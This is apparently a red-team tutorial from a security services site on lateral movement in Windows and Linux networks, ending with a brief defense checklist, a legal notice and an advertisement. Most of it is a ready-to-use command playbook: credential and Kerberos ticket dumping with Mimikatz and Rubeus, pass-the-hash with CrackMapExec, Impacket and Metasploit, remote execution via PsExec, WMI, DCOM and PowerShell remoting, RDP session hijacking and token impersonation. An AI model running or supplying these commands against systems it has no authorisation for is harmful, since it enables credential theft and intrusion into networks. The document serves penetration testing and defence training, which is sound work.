Lateral movement refers to techniques attackers use to move through a network after initial compromise, searching for key assets and data. Understanding these techniques is critical for both offensive security testing and defensive operations.
What is Lateral Movement?
Lateral movement is the process of moving from one compromised system to another within a network. Attackers use various techniques to authenticate to remote systems, execute code, and expand their access across the infrastructure.
Pass-the-Hash (PtH)
Pass-the-Hash allows attackers to authenticate to remote systems using NTLM password hashes without knowing the plaintext password.
# Extract NTLM hashes with Mimikatz
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
# Format: LM Hash:NT Hash
# Example: aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
# Pass-the-Hash with CrackMapExec
crackmapexec smb 10.0.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42'
crackmapexec smb 10.0.1.10 -u admin -H 'hash' -x "whoami"
# Pass-the-Hash with Impacket
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 [email protected]
wmiexec.py -hashes :e19ccf75ee54e06b06a5907af13cef42 [email protected]
smbexec.py -hashes :e19ccf75ee54e06b06a5907af13cef42 [email protected]
# Metasploit PtH
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
set RHOST 10.0.1.10
exploit
Pass-the-Ticket (PtT)
Pass-the-Ticket involves using stolen Kerberos tickets to authenticate to services without needing passwords or hashes.
# Extract Kerberos tickets with Mimikatz
sekurlsa::tickets /export
# List available tickets
kerberos::list
# Inject ticket into current session
kerberos::ptt [0;3e7][email protected]
# Verify ticket injection
klist
# Use Rubeus for ticket manipulation
Rubeus.exe dump /nowrap
Rubeus.exe ptt /ticket:base64ticket
# Linux: Use ticket with impacket
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py -k -no-pass domain.local/[email protected]
Remote Execution Methods
PsExec
# Sysinternals PsExec
PsExec.exe \\10.0.1.10 -u domain\admin -p password cmd.exe
PsExec.exe \\10.0.1.10 -u admin -p pass -s cmd.exe # Run as SYSTEM
# Impacket psexec.py
psexec.py domain/admin:[email protected]
psexec.py -hashes :ntlmhash domain/[email protected]
# CrackMapExec with command execution
crackmapexec smb 10.0.1.10 -u admin -p password -x "whoami"
crackmapexec smb 10.0.1.10 -u admin -p password -X '$PSVersionTable'
WMI (Windows Management Instrumentation)
# WMI command execution
wmic /node:10.0.1.10 /user:admin /password:pass process call create "cmd.exe /c calc.exe"
# Impacket wmiexec.py
wmiexec.py domain/admin:[email protected]
wmiexec.py -hashes :ntlmhash [email protected]
# PowerShell WMI
$cred = Get-Credential
Invoke-WmiMethod -ComputerName 10.0.1.10 -Credential $cred -Class Win32_Process -Name Create -ArgumentList "powershell.exe"
# CrackMapExec WMI
crackmapexec wmi 10.0.1.10 -u admin -p password -x "whoami"
PowerShell Remoting
# Enable PS Remoting (if needed)
Enable-PSRemoting -Force
# Interactive session
$cred = Get-Credential
Enter-PSSession -ComputerName 10.0.1.10 -Credential $cred
# Execute command remotely
Invoke-Command -ComputerName 10.0.1.10 -Credential $cred -ScriptBlock {whoami}
# Execute script remotely
Invoke-Command -ComputerName 10.0.1.10 -Credential $cred -FilePath .\script.ps1
# Multiple hosts
Invoke-Command -ComputerName 10.0.1.10,10.0.1.20 -Credential $cred -ScriptBlock {Get-Process}
DCOM (Distributed Component Object Model)
# MMC20.Application DCOM
$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.1.10"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c calc.exe","7")
# ShellWindows DCOM
$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.0.1.10")
$obj = [System.Activator]::CreateInstance($com)
# Impacket dcomexec.py
dcomexec.py domain/admin:[email protected]
dcomexec.py -object MMC20 domain/admin:[email protected]
RDP Hijacking
# List RDP sessions
query user
qwinsta
# Hijack session without password (requires SYSTEM)
PsExec.exe -s cmd.exe
tscon 2 /dest:rdp-tcp#0
# Using Mimikatz
privilege::debug
ts::sessions
ts::remote /id:2
# Enable RDP remotely
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
SSH Lateral Movement (Linux)
# SSH with password
ssh [email protected]
sshpass -p 'password' ssh [email protected]
# SSH with private key
ssh -i /path/to/key [email protected]
# SSH agent forwarding
ssh -A user@jumphost
ssh user@internal-host # Uses forwarded agent
# SSH without password (key-based)
ssh-keygen -t rsa
ssh-copy-id [email protected]
# Execute command via SSH
ssh [email protected] "whoami; uname -a"
# SCP file transfer
scp file.txt [email protected]:/tmp/
scp [email protected]:/etc/passwd ./
Token Impersonation
# Meterpreter token manipulation
use incognito
list_tokens -u
impersonate_token DOMAIN\\Administrator
# Steal token
steal_token PID
# Revert to original token
rev2self
# PowerShell token stealing
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "DOMAIN\admin"
Defense Strategies
Preventing Lateral Movement
Implementing multiple defensive layers can significantly hinder lateral movement attempts:
- Credential Hygiene: Use unique local admin passwords (LAPS)
- Privilege Separation: Implement tiered admin model
- Network Segmentation: Isolate critical assets
- Disable NTLM: Use Kerberos authentication only
- Protected Users Group: Add privileged accounts to this group
- Credential Guard: Enable Windows Defender Credential Guard
- Just-in-Time Access: Use PAM solutions for temporary elevated access
- Monitoring: Detect anomalous authentication patterns
Legal Notice
Lateral movement techniques should only be used in authorized penetration testing engagements. Unauthorized access to computer systems is illegal.
HackHub Professional Services
Expert Red Team & Lateral Movement Testing
The HackHub team has over 10 years of experience conducting advanced red team operations and lateral movement assessments. We help organizations identify and remediate weaknesses in their internal security controls, Active Directory configurations, and authentication mechanisms.
Contact [email protected] for professional security assessment services.
Conclusion
Lateral movement is a critical phase of post-exploitation that allows attackers to expand their access and reach high-value targets. Understanding these techniques helps both red teams conduct realistic assessments and blue teams implement effective defenses. Regular security testing and continuous monitoring are essential for detecting and preventing lateral movement in enterprise networks.